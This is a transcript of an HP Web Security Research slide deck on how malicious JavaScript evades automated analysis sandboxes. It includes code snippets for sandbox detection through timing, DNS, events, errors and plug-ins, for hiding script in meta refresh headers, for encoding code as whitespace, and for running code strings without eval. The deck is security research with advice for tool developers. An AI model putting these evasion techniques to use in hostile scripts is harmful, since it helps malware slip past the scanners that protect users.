© 2007 hewlett-packard development company, l.p. the information contained herein is subject to...
TRANSCRIPT
© 2007 Hewlett-Packard Development Company, L.P.The information contained herein is subject to change without notice
Circumventing Automated JavaScript Analysis
Billy Hoffman ([email protected])
HP Web Security Research Group
Overview• JavaScript is part of attackers toolkit
−All the “vanilla” stuff over
−Packing traditional malware
• IBM ISS: “In second half 2007 Web attack obfuscation approached 100%”*
• Exploit frameworks amplify the problem−Rapid adoption of new techniques
• We need tools to analyze this• How are we doing and can we win?
* From: IBM Internet Security Systems X-Force® 2008 Mid-Year Trend Statistics
Obfuscation Design Pattern• Malicious code is stored
−String literals
−Numeric literals
• Decode function unpacks literals into new code
• Ratio of literals to total code is huge!−Normal code: 2%-7%
−Obfuscated code: > 30%
Obfuscation Example
Obfuscation != Malicious• Legitimate reasons for obfuscating
−“Protect” client-side code
−Reducing download size
• Common packers−JSMin
−Dean Edwards packer
−Yahoo’s
• Result: Its tough to know what to analyze
Original Approach to JS Analysis• The Lazy Method
−Replace dangerous calls with alert()
−Run in a browser
• The Tom Liston Method−Wrap writes in <TEXTAREA>’s
−Run in a browser
• The Perl-Fu Method−Port malware to in Perl
• The Monkey Wrench Method−Run it in Spider Monkey
Tricks to Defeating Analysis• Deliberate sandbox breaks
−</TEXTAREA>
• Integrity Checks−Arguments.callee.toString()
• arguments.callee.toString().replace(/\W/g,"").toUpperCase();
−Gives source code of function body• Length checks
• Use function body as key
VBScript Wrapper• Still in use!
−Older DHTML web apps
−Plug-in enumeration (IE8)
−Malware
• No open source VBScript parsers
• No public standard grammar
• Not very wide-spread
VBScript
JavaScript
JavaScript
Preventing Sample Collection• Can’t reverse what you don’t have!• Track IPs
−Geolocation
−Blacklist security firms
• Serve once per IP• User-agent sniffing• document.referrer tricks
For those playing at homeApproach Difficulties
All Approaches Sampling Prevention
The Lazy Method Integrity checksRunning hostile code in browser
The Tom Liston Method Integrity checks</TEXTAREA> escapesRunning hostile code in browser
Perl Fu Way too time consumingTranslating JavaScript constructs
The Monkey Wrench Approach Does pretty well
Approach Today• Combination of automatic and manual• Interpreters and debuggers (aka
sandboxes)−Rhino
−NJS
−DecryptJS
−SpiderMonkey
• Trap/monitor certain events−DOM calls
−eval()s, etc
Its More Complex Than That• JS interpreter/debugger
less than ½ the battle• JavaScript != DOM
−Host objects
−Events/Timers
−HTTP requests
−Error handling
• DOM >= HTML−HTTP headers/cookies
−Browser environment
−Plug-ins
Fundamental Issue
Current JavaScript sandboxes fail to fully/properly emulate browser
environment. These discrepancies are detectable by the JavaScript
running inside the sandbox.
Fundamental Issue
.!=
Detecting JavaScript Sandboxes• 4 big areas
−DOM Testing
−Network Testing
−Execution Environment Testing
−Plug-in Testing
• Use test results−Decrypt next layer
−Handshake to serve next layer
DOM Testing• Using the DOM values• Detecting presence/lack of• Get and sets on values• Interacting with HTML elements
DOM Testing: Basic• Sandbox Specific Functions
−gc()
−clone()
−trap()
−untrap()
−readline()
• Malware forces SpiderMonkey to die−try {quit();} catch (e) { }; //more code here
Detecting Sandbox Specific Functionsif(typeof(gc)==“function”) {… } else {…}
Function Clobbering• JavaScript is highly dynamic• Can redefine functions at runtime!
19
Redefining print() as quit()
Redefining quit()To Nothing
Intertwined DOM Properties• Various aliases in the DOM
−document.location == window.location == document.URL
−window == window.window == window.self == window.parent• == window.self.self.self.self...
−Any global variable attaches to window• var spi = 5; window.spi == spi; //true
• Set a value on one alias• Read on another alias• Different values means sandbox
document.retarded• Mosaic Netscape 0.9beta
(1994)• Set using HTTP headers
−Set-Cookie:
−Cookie:
• Get/Set using JavaScript−document.cookie
document.retarded• Mosaic Netscape 0.9beta
(1994)• Set using HTTP headers
−Set-Cookie:
−Cookie:
• Get/Set using JavaScript−document.cookie
•Set using HTML−<META> tag
Meta Tag• Supply meta data about HTML document• http-equiv attribute
−Allows document to specify HTTP headers
−Content overriding an application protocol
HTTP-EQUIV to the rescue• Setting cookies with HTML<html>
<meta HTTP-EQUIV="Set-Cookie" CONTENT="cook2=Value 2">
<meta HTTP-EQUIV="Set-Cookie" CONTENT="cook1=Value 1">
<script>
alert(document.cookie);
</script>
Setting Cookies with HTML
Hello Proprietary Extension!• Setting cookies with HTML<html>
<meta HTTP-EQUIV="Set-Cookie" CONTENT="cook2=Value 2; HttpOnly">
<meta HTTP-EQUIV="Set-Cookie" CONTENT="cook1=Value 1">
<script>
alert(document.cookie);
</script>
Setting Cookies with HTML
More Meta Tag Fun• Hide Script in non-scriptable attribute
<html>
<title>Safe</title>
<meta http-equiv="refresh" content="0;url=javascript:alert(‘EVIL’)“>
<h1>All safe. Trust me!</h1>
</html>
HTTP Refresh Header• Completely remove JS from response body!
HTTP/1.1 200 OK
Refresh: 0;url=javascript:alert('EVIL!')
Connection: close
Content-Length: 29
<h1>I'm Clean... really.</h1>
Psst!
(IE8 supports the data: URI...
data:text/html and data:text/javascript are
awesome!)
Network Testing• Sandbox use dummy network objects
−Good “Are you a browser?” test
• Use information about response−DNS successful?
−Last Modified?
−Image Dimensions?
−Valid Response?
• Forces Sandbox to send network traffic−Web bugs for hackers?
Network Testing – DNS Lookups<script>
var count =0;
function loaded(name) {if(name!="bad")count++;}
window.onload = function evil() {
if(count == 1) alert("Browser!");
else alert("Sandbox!");
}
</script>
<iframe src="http://doesnotexist1" onload="loaded(this.name);" name="bad"></iframe>
<iframe src="http://doesnotexist2" onload="loaded(this.name);" name="bad"></iframe>
<iframe src="http://exists/foo.html" onload="loaded(this.name);" name="good"></iframe>
Network Testing – DNS Lookups
Network Testing - Images• Image object provides rich meta data
−Length
−Width
−Image was valid?
• CSS Images too• Use this information
−Complex handshaking
−Construct a Key
var img = new Image();
img.onload = goodFunc;
img.onerror = badFunc;
img.src="http://evil.com/"
Side Note: Image Side Channels• JavaScript Image object• Height + width = 8 bytes• How to send 0xFFFFFFFF without 4GB of
pixel data?−GIF, PNG, Windows too short
−BMP + RLE? Nope
• XBM Image Format#define w 1351
#define h 1689
static char b[]={0};
FF XBM WTF??!!!1111oneoneoneomg
The Dan Kaminski Option
Network Testing - Ajax• Ajax can see HTTP response headers
−Complex handshaking
−Construct a key
var xhr = new XmlHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState==4 && xhr.status=200)
{
if(xhr.getResponseHeader("Secr3t") == "key") {
//do evil
}
}
}
Execution Environment Testing• Sandbox execute code differently
−Trap function calls
−Step/break on code
−Manipulate data
• Can tell these differences−Timing information
−Event Order
−Error Handling
Timing Information• Use JavaScript’s Date object
−Millisecond resolution times
• Can detect paused execution<script>
var start = (new Date()).getTime();
document.writeln(String.fromCharCode(66,77,72));
</script>
<script>
var diff= (new Date()).getTime() - start;
if(diff < 3) document.writeln("Browser");
else document.writeln("Sandbox");
</script>
Detecting Steps/Breaks with Timers• Timers are a pain!
−Can’t really wait 5 seconds
−Ordering
−Clearing
• Can detect paused execution
• Start a Timer−Perform some math operation
• After fixed interval−Sample the value
Count++Count++ …
Count++
Detecting Steps/Breaks with Timersvar count = 0;
setInterval("count++;", 10);
setTimeout(checkSum, 1000);
function checkSum() {
//allow for skew
if(count >= 950 && count <=1000) {
alert("Browser");
} else {
alert("Sandbox");
}
}
Event Order• Sandboxs don’t run events in the proper order• XmlHttpRequest’s onreadystatechange() fires 4
times• onclick() >> onclick() >> ondbclick()• onkeydown() >> onkeyup() >> onkeypress()• onmousedown() >> onmouseup() >> onclick()• onmouseover() >> onmousemove()• onclick() >> onfocus() (for inputs)• onfocus() >> onblur()• onload() >> onunload()
Advanced Event Order• Dependant’s onload before
window.onload−iFrames
−Images
• Event propagation−DOM events must bubble
−Continue based on return value of event
• Events that never fire−Invisible with CSS INPUT
DIV
DIV
BODY
WINDOW
onclick
onclick
onclick
Error Handling• window.onerror handles uncaught exceptions • Induce syntax errors• Recover in handler<script>
window.onerror = function() {
//evil code
}
</script>
<script>
Lolz &nd B00m$; //Syntax Error
</script>
Error Handling• window.onerror handles uncaught exceptions • Induce runtime errors• Harder to handle/debug
window.onerror = function() {
//evil code
}
function boom() {
return ‘so long!’ & boom();
}
boom(); // error too much recursion
Advanced Error Handling• Detailed info passed to window.onerror−Message
−File
−Line Number
• Can be to−Fingerprint web browser
−Verify domain/location
−Construct a decryption key
Plug-in Testing• Not just navigator.plug-ins checks• Timing is a cool test
−Did I really invoke that ActiveX object?
• Sizing is a cool test−Is that Applet really 400 x 300?
• Cross Communication−Really sexy!
−Apply previous methods inside plug-in• Error handling, Eventing, etc
JavaScript -> Flash -> JavaScript• Multiple ways
−getURL();
−Flash LSO
• Additional capabilities−Richer HTTP requests
−More File formats
• Excellent browser support
Flash
JavaScript
JavaScript
JavaScript -> Java -> JavaScript• Lots of fun object casting
−JSObject -> double -> JSObject• Java has more capabilities than JS
−High resolution timers
−Sockets
−Internal IP• Assault the researcher!
−Signed Applets can access the file system!
• LiveConnect−var myAddress = java.net.InetAddress.getLocalHost();
Java
JavaScript
JavaScript
Preventing Sample Gathering• Browser Identification for Web Applications
(Shreeraj Shah 2004)• HTTP headers
−Ordering and Values
−Redirects, form posts, content types, cookie settings
• HTTP Caching−Obeying the directives
• HTTP/1.1 HTTP/1.0 Precedence
−Sending conditional GETs
Crazy Idea #1• Obfuscated Code is
obviously interesting−But not always malicious
• “Safe” looking code might not be interesting
• Can I create code that doesn’t look malicious?
Dehydrating a String• Converts any string into whitespace• 7 bit per character
−1 = space
−0 = tab
• \n means we are done• ‘a’ = 1100001• Dehydrate('a') = space, space, tab, tab,
tab, tab, space
Dehydrate Functionfunction dehydrate(s) { var r = new Array(); for(var i=0; i < s.length; i++) { for(var j=6; j >=0; j—) { if(s.charCodeAt(i) & (Math.pow(2,j))) { r.push(' '); } else { r.push('\t'); } } } r.push('\n'); return r.join('');}
Hydrate Functionfunction hydrate(s) {
var r = new Array();
var curr = 0;
while(s.charAt(curr) != '\n') {
var tmp = 0;
for(var i=6; i>=0; i—) {
if(s.charAt(curr) == ' ') {
tmp = tmp | (Math.pow(2,i));
}
curr++;
}
r.push(String.fromCharCode(tmp));
}
return r.join('');
}
Invisible Malicious Code!//st4rt
//3nd
var html = document.body.innerHTML;
var start = html.indexOf("//st" + "4rt");
var end = html.indexOf("3" + "nd");
var code = html.substring(start+12, end);
eval(hydrate(code));
Crazy Idea #2• Who cares how its
encoded? • Eventually they have to
execute the string of code
• CaffeineMonkey et al are just hooking eval()
• Can I execute malicious code stored in a string without eval()?
Eval() The Interpreter has a Posse…var evilCode = "alert('evil');";
window.location.replace("javascript:" + evilCode);
document.location.replace("javascript:" + evilCode);
setTimeout(evilCode, 10);
setInterval(evilCode, 500);
new Function(evilCode)();
//IE only
window.execScript(evilCode);
60
Fixing All of This• Advice for tool developers
−Remove discrepancies between sandbox and browser• DOM/HTTP/DNS/Network/Eventing
−Everything should be interesting
−The sandbox needs a sandbox; you will be attacked.
• Advice for others−Microsoft
• Publish a Grammar for VBScript
• Disable completely based on DOCTYPE
−Adobe: Release an controllable Flash VM
Shoulders of Giants• Jose Nazario• Ben Feinstein• Internet Storm Center guys• Stephan Chenette, et al. @ WebSense• Shreeraj Shah• Rob Freeman• Aviv Raff
Questions?
© 2007 Hewlett-Packard Development Company, L.P.The information contained herein is subject to change without notice
Circumventing Automated JavaScript Analysis
Billy Hoffman ([email protected])
HP Web Security Research Group